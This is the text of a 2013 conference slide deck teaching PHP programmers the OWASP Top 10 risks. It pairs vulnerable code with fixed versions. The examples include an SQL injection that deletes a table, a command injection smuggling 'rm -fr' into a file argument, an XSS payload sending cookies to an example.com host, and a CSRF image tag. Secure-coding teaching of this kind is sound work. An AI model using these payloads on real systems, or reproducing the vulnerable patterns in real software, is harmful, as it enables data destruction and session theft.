OWASP TOP 10 for PHP Programmers

Follow this topic: @rjsmelo, #owasp, #php, #appsec OWASP TOP 10 for PHP programmers RICARDO MELO Presented at #PHPLX – 11 September 2013

@rjsmelo 2 RICARDO MELO ● CTO @ DRI ● PHP, Mysql, Linux and lots of other OSS ● ZCE, RHCE, LPI 3, ITIL, etc ● +10 years building (and breaking) things

@rjsmelo 3 About ● 14 Year old academic spin-off ● Pragmatic OSS Orientation ● PHP, Mysql, SugarCRM, Drupal, JavaScript, Linux, etc. ● Crafters, Integrators ● Always looking for software developers – Yes, right now!

1999 - 2013 DRI. Some Rights Reserved . 4 Outline ● OWASP ● OWASP TOP 10 ● What's Next ● Conclusions

1999 - 2013 DRI. Some Rights Reserved . 5 What is OWASP? ● Open Web Application Security Project ● World wide non-for-profit ● Focus on security improvement and awareness ● Very active community ● Lots of projects (you can start yours)

1999 - 2013 DRI. Some Rights Reserved . 6 What is OWASP TOP 10 ● The name is “The Top 10 Most Critical Web Application Risks” ● The focus is awareness ● Released 2003, 2004, 2007, 2010 and 2013 https://www.owasp.org/index.php/Top_10_2013

1999 - 2013 DRI. Some Rights Reserved . 7 Risk ? Thread Agent Attack Vectors Weakness Prevalence Weakness Detectability Technical Impacts Business Impacts Application Specific EASY WIDESPREAD EASY SEVERE Application / Business Specific AVERAGE COMMON AVERAGE MODERATE DIFFICULT UNCOMMON DIFFICULT MINOR

1999 - 2013 DRI. Some Rights Reserved . 8 OWASP TOP 10 - 2013 ● A1 – Injection ● A2 – Broken Authentication and Session Management ● A3 – Cross-site Scripting (XSS) ● A4 – Insecure Direct Object References ● A5 – Security Misconfiguration ● A6 – Sensitive Data Exposure ● A7 – Missing Function Level Access Control ● A8 – Cross Site Request Forgery (CSRF) ● A9 – Using Components with Known Vulnerabilities ● A10 – Unvalidated Redirects and Forwards

1999 - 2013 DRI. Some Rights Reserved . 9 A1 - Injection ● Occurs when untrusted data is sent directly to the interpreter! ● Not only SQL: NoSQL, Ldap, OS, XML, Xpath! ● Never, NEVER trust ANY input!

1999 - 2013 DRI. Some Rights Reserved . 10 A1 – Injection Examples - SQL <?php // prune to sql injection // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->query( "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10"); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result); // what if I set record = "1; delete from some_table; -- " <?php // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->prepare("SELECT * FROM some_table limit ?,10"); $stmt->execute(array($_REQUEST['start_record'])); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result);

1999 - 2013 DRI. Some Rights Reserved . 11 A1 - Injection Samples - OS <?php // script.php?file=xpto.pdf $fileType = exec( "file " . $_REQUEST['file']); echo $fileType; // but one can try with "xpto.pdf; rm -fr /some/folder" <?php // script.php?file=xpto.pdf $fileType = exec( "file " . escapeshellarg($_REQUEST['file'])); echo $fileType;

1999 - 2013 DRI. Some Rights Reserved . 12 A2 – Broken Authentication and Session Management ● Broken implementations allowing attacker to assume “other” user's identity! ● Can be session hijack/fixation ● Broken authentication ● Or other fails that lead to compromise passwords / keys / session tokens

1999 - 2013 DRI. Some Rights Reserved . 13 A2 – Session Fixation <?php // Prune to session fixation // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ] <?php // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { session_regenerate_id(); $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ]

1999 - 2013 DRI. Some Rights Reserved . 14 A3 – Cross-Site Scripting (XSS) ● Whenever untrusted data is sent to the browser without proper validation and escaping! ● XSS allows the attacker to OWN the victims browser and do ... everything! ● Stored, Reflected and DOM based XSS

1999 - 2013 DRI. Some Rights Reserved . 15 A3 – steal user cookie <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= $_REQUEST['search']; ?> <?= render_results($results); ?> </body> </html> // set search to: "<script>document.location='http://www.example.com/precious_cookie ?cookie='+document.cookie</script>" <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?> <?= render_results($results); ?> </body> </html>

1999 - 2013 DRI. Some Rights Reserved . 16 A4 – Insecure Direct Object Reference ● Whenever developer exposes references to internal objects and don't have proper access control. ● Attackers can change the references and access resources that shouldn't be accessible.

1999 - 2013 DRI. Some Rights Reserved . 17 A4 – Access other user account <?php // prune to insecure direct reference // script.php?account=10 $accountId = intval($_REQUEST['account']); $account = new Account($accountId); echo render_account_info($account); // and if I change account to "9" ? <?php // script.php?account=10 $user = new User($_SESSION['userInfo']); $accountId = intval($_REQUEST['account']); $account = new Account($accountId); if ( $account->canRead($user)) { echo render_account_info($account); } else { echo "Access denied"; }

1999 - 2013 DRI. Some Rights Reserved . 18 A5 – Security Misconfiguration ● Often fails in securing the full stack leads to application / servers being compromised. ● Take into consideration other services / applications running in the same infrastructure ● Watch out for outdated software ● Watch out for default accounts

1999 - 2013 DRI. Some Rights Reserved . 19 A6 – Sensitive Data Exposure ● Whenever sensitive data isn't properly protected allowing attackers to steal or modify that information. ● Credit Card fraud, Identity theft, etc! ● Be aware, data should be protected both in transit or on the storage engine (don't forget the backups)

1999 - 2013 DRI. Some Rights Reserved . 20 A7 – Missing Function Level Access Control ● Most applications validate function based access control before displaying options in UI, but fail to validate when the function is accessed. ● Attacker can forge request to functions that shouldn't be available

1999 - 2013 DRI. Some Rights Reserved . 21 A7 – insecure function <?php // prune to insecure function access // script.php?user=john&action=read $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $user = new User($userId); switch($action) { case 'read': echo render_user($user); break; case 'delete': $user->delete(); echo "user Deleted"; break; } // and if I change action to "delete"? <?php $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $loggedUser = new AppUser($_SESSION['userInfo']); $user = new User($userId); switch($action) { case 'read': if ( $user->canRead($loggedUser) ){ echo render_user($user); } break; case 'delete': if ( $user->canDelete($loggedUser) ){ $user->delete(); echo "user Deleted"; } break; }

1999 - 2013 DRI. Some Rights Reserved . 22 A8 – Cross Site Request Forgery (CSRF) ● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session) ● No difference from user generated requests!

1999 - 2013 DRI. Some Rights Reserved . 23 A8 – delete user <?php // vulnerable app // delete.php?id=123 $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if ( $user->canDelete($loggedUser) ){ $user->delete(); } ?> // attackers site: <img src="http://www.example.com/users/delete.php?id=123" /> <?php // vulnerable app $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if (validate_token($_REQUEST['token'])) { if ( $user->canDelete($loggedUser) ){ $user->delete(); } }

1999 - 2013 DRI. Some Rights Reserved . 24 A9 – Using Components with know Vulnerabilities ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities. ● Attackers can leverage this issues to attack your application / server / etc.

1999 - 2013 DRI. Some Rights Reserved . 25 A10 – Unvalidated Redirects and Forwards ● Web application often redirects users to other pages, using untrusted data to determine the destination pages. ● Atackers can redirect victims to phishing or malware pages or use forwards to access unauthorized pages.

1999 - 2013 DRI. Some Rights Reserved . 26 A10 – “simple” Forward <?php class someController extends baseController { public function preFunction($args,$action) { $this->checkAccess($args, $action); } public function indexAction($args) { // [...] do something here if ( $args['callback'] && method_exists($this,$args['callback'])){ unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); } return $response; } public function destroyAction($args) { $this->selfTerminate(); } } if ( $args['callback'] && method_exists($this,$args['callback'])){ $this->preFunction($args,$args['callback']); unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); }

1999 - 2013 DRI. Some Rights Reserved . 27 What's Next For PHP Programmers ● OWASP – http://goo.gl/lVRRY ● Cheat Sheets – http://goo.gl/lVRRY ● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H ● OWASP Books – free – http://goo.gl/aLx1q2

1999 - 2013 DRI. Some Rights Reserved . 28 Conclusions ● Keep the application secure is a continuous process ● Avoiding the TOP 10 Risks don't make your application secure, but is already a HUGE step forward. ● Don't trust ANY input! Escape every output!

Follow this topic: @rjsmelo, #owasp, #php, #appsec QA Feedback: https://joind.in/9107

www.dri-global.com @rjsmelo ricardo.melo@dri-global.com

OWASP TOP 10 for PHP Programmers

More Related Content

Similar to OWASP TOP 10 for PHP Programmers

More from rjsmelo

Recently uploaded

OWASP TOP 10 for PHP Programmers